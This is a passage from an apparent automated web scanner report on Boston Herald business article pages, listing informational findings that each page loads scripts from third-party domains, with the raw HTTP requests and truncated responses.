http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/automotive/view/20101105value_of_gms_new_stock_difficult_to_pin_down/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:21:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.16. http://bostonherald.com/business/automotive/view/20101106lincoln_goes_green_with_mkz_hybrid_2011_luxury_sedan_gets_41_mpg_in_city_driving/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/automotive/view/20101106lincoln_goes_green_with_mkz_hybrid_2011_luxury_sedan_gets_41_mpg_in_city_driving/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/automotive/view/20101106lincoln_goes_green_with_mkz_hybrid_2011_luxury_sedan_gets_41_mpg_in_city_driving/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:21:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.17. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:21:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.18. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/automotive/view/20101107blinking_jetta_hates_her_husband/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/automotive/view/20101107blinking_jetta_hates_her_husband/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:19:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.19. http://bostonherald.com/business/general/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/general/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE

Request

GET /business/general/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:32:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.20. http://bostonherald.com/business/general/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/general/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.21. http://bostonherald.com/business/general/view/20101107ads_fueled_victory_of_question_1/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/general/view/20101107ads_fueled_victory_of_question_1/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/general/view/20101107ads_fueled_victory_of_question_1/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:59:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.22. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:57:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 76486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.23. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
